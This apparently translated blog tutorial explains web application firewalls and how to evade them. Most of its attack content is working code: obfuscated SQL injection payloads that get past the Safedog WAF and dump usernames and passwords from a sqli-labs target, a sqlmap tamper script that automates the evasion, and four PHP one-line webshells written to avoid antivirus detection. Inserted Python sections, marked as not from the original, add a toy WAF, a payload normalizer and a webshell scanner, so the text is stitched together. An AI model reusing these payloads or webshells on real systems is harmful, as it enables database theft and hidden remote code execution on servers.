WAF Bypass and case practice


WAF Bypass

Web applications face many security risks, most of which stem from Web vulnerabilities. Common Web security vulnerabilities include:

  • SQL injection, XSS, CSRF

  • File system vulnerabilities: arbitrary file upload, arbitrary file read, arbitrary file inclusion, arbitrary file deletion, directory traversal...

  • Directory browsing

  • RCE

  • Deserialization vulnerabilities

  • Logic vulnerabilities: broken access control (privilege escalation)...

  • SSRF

  • Component security: Apache, IIS, Nginx...

Protecting Web applications calls for a dedicated security product: the Web Application Firewall (WAF).

1. WAF

1.1 WAF Overview

WAF is short for Web Application Firewall. Using the internationally accepted definition, a WAF is a product designed specifically to protect Web applications by enforcing a series of security policies targeted at HTTP/HTTPS traffic. From this definition it is clear that a WAF works at the application layer and protects Web applications through specific security policies.

1.1.1 Common WAFs

Identify WAFs from their block pages: a collection of common WAF interception pages.

1.1.2 WAF Category

According to different classification methods, WAF can be classified into many categories.

Product form, description and typical products:

Soft WAF: installed as software on the protected server. Because it runs on the server, it can access the server's files and directly detect whether a WebShell exists or whether files have been created. Typical products: Security Dog, Cloud Lock, D Shield.

Hard WAF: deployed on the link as a hardware appliance and supports several deployment modes. When connected inline, it can intercept malicious traffic; in bypass (listening) mode it only records attacks without intercepting them. Typical products: Cloud Lock, D Shield, Thunder Pool.

Cloud WAF: generally works as a reverse proxy. By configuring NS or CNAME records, requests for the website first pass through the WAF host; after filtering, the requests judged harmless are forwarded to the real website server for processing. It can be described as a CDN with protection built in. Typical products: Alibaba Cloud Cloud Shield, Tencent Cloud WAF, Anheng Wudun.

Built-in WAF: a WAF built into the website system, i.e. filtering embedded directly in the application code. It has a relatively high degree of freedom and usually takes the following forms:
  ● Converting input parameter types (intval, etc.).
  ● Checking the validity of input parameters.
  ● Inspecting the input along the code path before key functions execute (SQL execution, page rendering, command execution, etc.).
  ● Replacing or filtering the input data before the code continues (escaping or replacing special characters, etc.).
A built-in WAF is more closely aligned with the business; with a good understanding of both security and the business, it yields fewer false positives and false negatives.


1.1.3 How WAF works

The WAF processing flow can be roughly divided into four stages: preprocessing, rule detection, the processing module, and logging.

Processing flow and description:

Preprocessing: when request traffic arrives, the WAF first determines whether it is an HTTP/HTTPS request, then checks whether the requested URL is on the whitelist. Whitelisted requests are handed directly to the backend Web server for processing; requests not on the whitelist have their packets parsed and then enter rule detection.

Rule detection: each WAF product has its own detection rule set. The parsed packets enter the detection engine for rule matching, which checks whether the request complies with the rules and identifies malicious attacks.

Processing module: the processing module takes different defensive actions depending on the detection result. Requests that pass the rules are handed to the backend Web server; requests that violate the rules are blocked, recorded, and raise an alert.

Logging: the WAF also records logs of its interception decisions throughout processing, so that users can review and analyze them later.
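
The four stages above, as an added Python example that is not code from the original post or from any WAF product: a toy inline filter with a URL whitelist, three constructed signatures, a pass/block/drop decision and an audit log. The whitelist prefixes, rule patterns, Request type, AUDIT_LOG and handle() function are all constructed for this demo.

```python
import re
import time
from dataclasses import dataclass
from urllib.parse import urlparse, unquote

# Constructed configuration for the demo: URL prefixes that skip inspection.
WHITELIST_PREFIXES = ("/static/", "/healthz")

# A deliberately small rule set; real products ship thousands of signatures.
RULES = [
    ("sqli", re.compile(r"(?i)\b(union\s+select|order\s+by|information_schema)\b")),
    ("xss", re.compile(r"(?i)<script|javascript:")),
    ("traversal", re.compile(r"\.\./")),
]

AUDIT_LOG: list[dict] = []


@dataclass
class Request:
    method: str
    url: str
    body: str = ""


def _record(req: Request, action: str, reason: str) -> dict:
    """Stage 4, logging: every decision is written out, not only the blocks."""
    entry = {
        "ts": round(time.time(), 3),
        "method": req.method,
        "path": urlparse(req.url).path,
        "action": action,
        "reason": reason,
    }
    AUDIT_LOG.append(entry)
    return entry


def handle(req: Request) -> dict:
    """Run one request through preprocessing, rule detection and the processing module."""
    # Stage 1, preprocessing: protocol check, then whitelist check.
    parsed = urlparse(req.url)
    if parsed.scheme not in ("http", "https"):
        return _record(req, "drop", "not-http")
    if any(parsed.path.startswith(p) for p in WHITELIST_PREFIXES):
        # Whitelisted URLs go straight to the backend without rule detection.
        return _record(req, "pass", "whitelist")
    # Packet parsing: decode the attacker-controlled parts into inspectable text.
    inspect_text = unquote(parsed.query) + "\n" + unquote(req.body)

    # Stage 2, rule detection: match the parsed request against the rule set.
    hits = [name for name, rx in RULES if rx.search(inspect_text)]

    # Stage 3, processing module: block on any hit, otherwise forward.
    if hits:
        return _record(req, "block", ",".join(hits))
    return _record(req, "pass", "clean")


if __name__ == "__main__":
    for r in (
        Request("GET", "http://site.test/static/app.js"),
        Request("GET", "http://site.test/sqli-labs/Less-1/?id=1%27%20union%20select%201,2,3--+"),
        Request("POST", "http://site.test/login", body="user=admin&pw=%3Cscript%3Ealert(1)%3C/script%3E"),
        Request("GET", "http://site.test/?id=1"),
    ):
        print(handle(r))
```

Two things worth noticing: the whitelist branch skips rule detection entirely, so whitelist prefixes must be narrow and should be compared against a normalized path; and every decision, including a pass, goes to the log, which is what makes the log useful for later analysis rather than only for counting blocks.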

1.1.4 WAF deployment methods

  1. Transparent bridge
  2. Reverse proxy
  3. Traffic mirroring
  4. Routing proxy

1.2 WAF fingerprint recognition


A "fingerprint" is a string or behavior with a specific, recognizable characteristic.

Fingerprint characteristics and the fields that carry them:

  • Response status code: '405 method not allow'
  • HTTP response header fields: Server, Cookie, X-Powered-By, and other special fields
  • Response body characteristics: 'errors.aliyun.com', 'waf.tencent-cloud.com'
  • Behavior: the block response page


1.2.1 WAF fingerprint identification tool

1.3 Various ways to circumvent WAF

  1. Dirty data
  2. Case conversion
  3. Double writing
  4. Inline comments

Summary of WAF mechanisms and bypass methods: injection.

2. SQLi Bypass

2.1 Bypass idea

2.1.1 Level issues

  • Architecture level

  • System level

  • Component level: HPP...

  • Code level: deformation, obfuscation...

  • WAF level

2.1.2 HTTP issues

  • Malformed requests: request method
  • Persistent connections
  • Chunked transfer encoding

2.2 Bypass analysis

Keyword → bypass form:

  • and → /*!14400and*/
  • order by → /**/order/*/%0a*a*/by/**/
  • union select → union/*!88888cas*/%a0/*/*!=*/select/**/
  • database() → database(/*!/*/**%0fAJEST*/*/)
  • from information_schema.tables → /*!from--%0f/*%0ainformation_schema.tables*/
  • from information_schema.columns → /*!from--%0f/*%0ainformation_schema.columns*/
  • count(*) → count(1)

Taking sqli-labs/Less-1/ as an example:

Adding dirty data to the request path to bypass the WAF.

However, when the data is too large, the URL exceeds the server's length limit.

2.2.1 Bypass method

?id=1'/*!14400and*/ 1=1 --+

Determine the number of columns:

?id=1'/**/order/*/%0a*a*/by/**/ 3 --+

Determine which columns are echoed:

?id=1'union/*!88888cas*/%a0/*/*!=*/select/**/ 1,2,3 --+

Get the database name:

?id=1'/*!14400and*/ 1=2 union/*!88888cas*/%a0/*/*!=*/select/**/ 1,2,database(/*!/*/**%0fwuhu*/*/) --+

Get the table names:

?id=2' /*!14400and*/ 1=2 union/*!88888cas*//*/%0a*a*/select/**/ 1,2,group_concat(table_name) /*!from--%0f/*%0ainformation_schema.tables*/ where table_schema=database(/*!/*/**%0f*/*/) --+

Get the columns of the table:

?id=2' /*!14400and*/ 1=2 union/*!88888cas*//*/%0a*a*/select/**/ 1,2,group_concat(column_name) /*!from--%0f/*%0ainformation_schema.columns*/ where table_schema=database(/*!/*/**%0f*/*/) /*!14400and*/ table_name='users'--+

Get the number of users:

?id=2' /*!14400and*/ 1=2 union/*!88888cas*//*/%0a*a*/select/**/ 1,2,count(*) /*!from--%0f/*%0ausers*/--+

Get usernames and passwords:

?id=2' /*!14400and*/ 1=2 union/*!88888cas*//*/%0a*a*/select/**/ 1,2,concat(username,0x3a,password) /*!from--%0f/*%0ausers*/ limit 1,1--+
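The obfuscated forms in the table of section 2.2 and in the requests above all rely on MySQL accepting comment and whitespace variants that a signature written against plain SQL does not expect. The following is an added example, not code from the original post: a small Python normalizer of the kind a WAF or a log-review tool applies before rule matching. It URL-decodes the parameter, expands /*!NNNNN ... */ version comments the way a MySQL server at an assumed version 8.0.30 would (the body executes when NNNNN is at or below the server version and is skipped otherwise), drops ordinary /* ... */ comments, collapses the unusual separators %0a, %0b, %0c, %0f and %a0, and then runs a few plain signatures. The sample inputs are the payloads from the page; the version threshold, rule names and the normalize() and inspect() functions are my own.

```python
import re
from urllib.parse import unquote_to_bytes

# Assumption for the demo: the protected database is MySQL 8.0.30, so a
# /*!NNNNN ... */ comment runs its body when NNNNN <= 80030 and is skipped otherwise.
ASSUMED_SERVER_VERSION = 80030

# One left-to-right pass over both comment forms, so a sequence such as /*/*!=*/
# is consumed as a single ordinary comment rather than as a version comment
# that starts in the middle of it.
COMMENT_RE = re.compile(r"/\*(!(\d*))?(.*?)\*/", re.DOTALL)

# Separators MySQL tolerates between tokens that rules written with a plain
# space character would miss (\x0b, \x0c, \x0f, and the 0xa0 byte).
WS_RE = re.compile(r"[\s\x0b\x0c\x0f\xa0]+")

RULES = [
    ("union-select", re.compile(r"\bunion\s+select\b")),
    ("order-by", re.compile(r"\border\s+by\b")),
    ("tautology", re.compile(r"\band\s+\d+\s*=\s*\d+")),
    ("schema-enum", re.compile(r"information_schema")),
    ("db-name", re.compile(r"\bdatabase\s*\(\s*\)")),
]


def _expand_comment(m) -> str:
    """Replace a comment by the text the server would execute, or by a space."""
    is_version = m.group(1) is not None
    digits = m.group(2) or ""
    body = m.group(3)
    if not is_version:
        return " "                      # ordinary comment: contributes nothing
    if digits and int(digits) > ASSUMED_SERVER_VERSION:
        return " "                      # version in the future: server skips the body
    return " " + body + " "             # body is executed as SQL


def normalize(raw_param: str) -> str:
    """Canonicalize one query-string value before signature matching."""
    # Decode to bytes so %a0 and %0f stay single bytes instead of becoming U+FFFD.
    decoded = unquote_to_bytes(raw_param.replace("+", " ")).decode("latin-1")
    expanded = COMMENT_RE.sub(_expand_comment, decoded)
    return WS_RE.sub(" ", expanded).strip().lower()


def inspect(raw_param: str):
    """Return (normalized text, names of the rules it triggers)."""
    text = normalize(raw_param)
    hits = [name for name, rx in RULES if rx.search(text)]
    # Delimiters left over after normalization mean the comment structure was
    # not resolved cleanly, which is itself a strong sign of obfuscation.
    if "/*" in text or "*/" in text:
        hits.append("unbalanced-comment")
    return text, hits


# Sample inputs taken from the page's own payloads; nothing here touches a server.
SAMPLES = [
    "1'/*!14400and*/ 1=1 --+",
    "1'/**/order/*/%0a*a*/by/**/ 3 --+",
    "1'union/*!88888cas*/%a0/*/*!=*/select/**/ 1,2,3 --+",
    "1,2,database(/*!/*/**%0fAJEST*/*/)",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        text, hits = inspect(sample)
        print(f"{sample!r:55} -> {text!r} {hits}")
```

The first three payloads normalize to ordinary SQL and each trips exactly the signature it was hiding from. The database() payload shows the limit of the approach: its nested-comment trick is not resolved by a regex pass, and the leftover `*/` is what gets it flagged instead. A WAF cannot canonicalize perfectly without reproducing the target database's lexer, and the gap between the WAF's parser and the database's parser is exactly what this whole family of payloads exploits; treating leftover or unbalanced comment delimiters as a finding is the pragmatic fallback.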

2.2.2 Writing the script

safedog_bypass.py

#!/usr/bin/env python

"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGHEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Rewrites keywords in the payload into the comment-wrapped forms used above:

    and                                 /*!-*/-/*and*/
    order by                            /**/order/*/%0a*a*/by/**/
    union all select                    /*!union/*/*!%0b-/*!88888cas*/select*/
    from information_schema.tables      /*!from--%0f/*%0ainformation_schema.tables*/
    from information_schema.SCHEMATA    /*!from--%0f/*%0ainformation_schema.SCHEMATA*/
    from information_schema.columns     /*!from--%0f/*%0ainformation_schema.columns*/
    [  as]                              /*!14400as*/
    char                                /*!14400char*/
    database()                          database(/*!/*/**WUHU%0f*/*/)
    #                                   --
    count(*)                            count(1)
    """
    payload = re.sub(r'(?i)and', "/*!-*/-/*and*/", payload)
    payload = re.sub(r'(?i)order by', "/**/order/*/%0a*a*/by/**/", payload)
    payload = re.sub(r'(?i)union all select', "/*!union/*/*!%0b-/*!88888cas*/select*/", payload)
    payload = re.sub(r'(?i)from information_schema.tables', "/*!from--%0f/*%0ainformation_schema.tables*/", payload)
    payload = re.sub(r'(?i)from information_schema.columns', "/*!from--%0f/*%0ainformation_schema.columns*/", payload)
    payload = re.sub(r'(?i)from information_schema.SCHEMATA', "/*!from--%0f/*%0ainformation_schema.SCHEMATA*/", payload)
    payload = re.sub(r"(?i) as", " /*!14400as*/", payload)
    payload = re.sub(r"(?i)char", "/*!14400char*/", payload)
    payload = re.sub(r"(?i)database\(\)", "database(/*!/*/**WUHU%0f*/*/)", payload)
    payload = re.sub(r"(?i)#", "-- ", payload)
    # The asterisk must be escaped: the earlier pattern "count\(*\)" matched
    # "count)" (zero or more "(" followed by ")") rather than "count(*)".
    payload = re.sub(r"(?i)count\(\*\)", "count(1)", payload)

    return payload

Run the script

python .\sqlmap.py -u "http://192.168.188.187/sqli-labs/Less-1/?id=1" -v3 --tamper safedog_bypass --random-agent

Note: --random-agent is an option of the sqlmap tool. It generates a random User-Agent header for each request, simulating different browsers and user agents.

python .\sqlmap.py -u "http://192.168.188.187/sqli-labs/Less-1/?id=1" -v3 --tamper safedog_bypass --random-agent --dbs

3. One-line webshell anti-virus evasion

3.1 Overview

3.1.1 Detection methods
  • Static detection
  • Dynamic detection
3.1.2 Bypass methods
  • Deforming the HTTP request packet: chunked transfer encoding, etc.
  • Deforming the one-line webshell itself to achieve dynamic evasion.

3.2 Example

3.2.1 Example1
<?php
$ajest = base64_decode('绕Y过X安N全z狗Z我X最J棒0!');

$ajest($_REQUEST[777]); 
?>
3.2.2 Example2
<?php
class Bypass{
    public $name;
    public $male;
    function __destruct()
    {
        $a = $this->name;
        $a($this->male);
    }
}
unserialize($_POST['777']);
// POST body: 777=O:6:"Bypass":2:{s:4:"name";s:6:"assert";s:4:"male";s:20:"eval($_REQUEST["x"])";}
?>
3.2.3 Example3
<?php
$fruits = array("a" => "lemon", "ss" => "orange", "ssr" => "banana", "t" => "apple");

function test_alter(&$item1, $key, $prefix)
{
    $item1 = "$prefix: $item1";
}

function test_print($item2, $key)
{
    echo "$key. $item2<br />\n";
}

echo "Before ...:\n";
array_walk($fruits, 'test_print');
$a = array_keys($fruits);
print_r($a);
$m = $a[0].$a[1];   // "a" . "ss"
$n = 'er';
$q = $m.$n.'t';     // assert
$r = $_REQUEST['wuhu'];
@$q($r);
?>
3.2.4 Example4
<?php
    $a = ('!'^'@').'s'.'s'.'e'.'r'.'t';
    $b='_'.'P'.'O'.'S'.'T';
    $c=$$b;
    $a($c['x']);
?>
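
Section 3.1.1 names static detection as one of the two detection methods. As an added example that is not part of the original post, here is a small static scanner in Python that scores PHP source on the indicators the four examples above share: a variable used as a function name and fed request data (directly, or through a variable assigned from a superglobal), unserialize() applied to request data, string literals combined with XOR, and variable-variables. The sample strings are constructed to mirror the four examples; the indicator weights, the threshold and the scan_php() function are my own.

```python
import re

SUPERGLOBAL = r"\$_(?:REQUEST|POST|GET|COOKIE)\b"

# Variables that receive request data directly, or via a variable-variable ($$name).
ASSIGN_FROM_INPUT = re.compile(r"\$(\w+)\s*=\s*(?:" + SUPERGLOBAL + r"|\$\$\w+)")
# A variable used as a function name; the first argument is captured for taint checks.
DYNAMIC_CALL = re.compile(
    r"@?\$(\w+)\s*\(\s*(" + SUPERGLOBAL + r"|\$this->\w+|\$(\w+))"
)
UNSERIALIZE_INPUT = re.compile(r"unserialize\s*\(\s*" + SUPERGLOBAL)
XOR_STRING = re.compile(r"'[^']*'\s*\^\s*'[^']*'")
VARIABLE_VARIABLE = re.compile(r"\$\$\w+")

THRESHOLD = 3   # constructed weights: one dynamic call on request data is enough


def scan_php(source: str) -> dict:
    """Score one PHP source file on webshell indicators."""
    score, reasons = 0, []
    tainted = {m.group(1) for m in ASSIGN_FROM_INPUT.finditer(source)}

    for m in DYNAMIC_CALL.finditer(source):
        callee, arg, arg_var = m.group(1), m.group(2), m.group(3)
        if arg.startswith("$_") or arg_var in tainted:
            score += 3
            reasons.append("variable function $%s() invoked on request data" % callee)
        elif arg.startswith("$this->"):
            score += 1
            reasons.append("variable function $%s() invoked on an object property" % callee)

    if UNSERIALIZE_INPUT.search(source):
        score += 2
        reasons.append("unserialize() of request data (object injection entry point)")
    if XOR_STRING.search(source):
        score += 2
        reasons.append("string built by XOR of literals (hides a function name)")
    if VARIABLE_VARIABLE.search(source):
        score += 1
        reasons.append("variable-variable access (hides a superglobal name)")

    return {"score": score, "flagged": score >= THRESHOLD, "reasons": reasons}


# Constructed samples mirroring the four examples above, plus a benign file.
SAMPLES = {
    "decoded_name": "<?php $f = base64_decode('YXNzZXJ0'); $f($_REQUEST[777]); ?>",
    "unserialize": ("<?php class B { public $name; public $male; "
                    "function __destruct(){ $a = $this->name; $a($this->male); } } "
                    "unserialize($_POST['777']); ?>"),
    "key_concat": ("<?php $a = array_keys($fruits); $q = $a[0].$a[1].'er'.'t'; "
                   "$r = $_REQUEST['wuhu']; @$q($r); ?>"),
    "xor_varvar": ("<?php $a = ('!'^'@').'s'.'s'.'e'.'r'.'t'; $b='_'.'P'.'O'.'S'.'T'; "
                   "$c=$$b; $a($c['x']); ?>"),
    "benign": "<?php $fruits = array('a' => 'lemon'); array_walk($fruits, 'test_print'); echo count($fruits); ?>",
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(name, scan_php(src))
```

The reason for scoring rather than keyword matching is that none of the four examples contains a literal eval( or assert( for a signature to catch; the callable name is assembled at runtime, so the scanner has to look at how the callable and its argument are put together. Dynamic calls on request data do appear in legitimate code (callback dispatchers, for instance), so a hit is a triage lead for a reviewer, not a verdict.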

Origin: blog.csdn.net/weixin_58783105/article/details/133198990